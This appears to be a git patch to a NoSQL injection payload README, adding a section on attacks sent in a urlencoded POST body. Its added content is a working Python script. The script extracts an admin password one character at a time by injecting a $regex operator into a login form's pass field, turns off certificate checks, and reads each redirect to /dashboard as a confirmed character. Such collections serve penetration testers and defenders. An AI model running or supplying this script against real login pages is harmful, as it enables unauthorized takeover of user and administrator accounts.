From e0f851e6e9e561b8ce71cab67f726da1ca461ae1 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Sun, 7 Nov 2021 17:49:50 +0100 Subject: [PATCH] NoSQLi: add POST with urlencoded body --- NoSQL Injection/README.md | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md index cebfe1b..a37eb71 100644 --- a/NoSQL Injection/README.md +++ b/NoSQL Injection/README.md @@ -98,6 +98,30 @@ while True: password += c ``` +### POST with urlencoded body + +```python +import requests +import urllib3 +import string +import urllib +urllib3.disable_warnings() + +username="admin" +password="" +u="http://example.org/login" +headers={'content-type': 'application/x-www-form-urlencoded'} + +while True: + for c in string.printable: + if c not in ['*','+','.','?','|','&','$']: + payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c) + r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) + if r.status_code == 302 and r.headers['Location'] == '/dashboard': + print("Found one more char : %s" % (password+c)) + password += c +``` + ### GET ```python